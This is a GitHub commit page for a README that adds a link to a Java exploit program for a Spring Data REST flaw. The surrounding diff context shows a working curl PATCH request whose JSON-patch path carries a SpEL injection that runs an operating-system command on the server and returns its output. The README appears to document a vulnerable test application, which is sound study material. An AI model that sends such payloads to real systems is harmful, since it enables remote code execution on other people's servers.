Skip to content

Commit 2f9d849

Browse files
author
Sardella Antonio Francesco
committed
Added reference to exploit software.
1 parent b98276e commit 2f9d849

File tree

1 file changed

+2
-0
lines changed

1 file changed

+2
-0
lines changed

README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -53,6 +53,8 @@ On Windows, a `cmd /c dir` command, and other similar commands, can be launched
5353
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"
5454
```
5555

56+
A Java program to exploit this vulnerability can be found [here](https://github.com/m3ssap0/spring-break_cve-2017-8046).
57+
5658
## Authors
5759

5860
* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)

0 commit comments

Comments
 (0)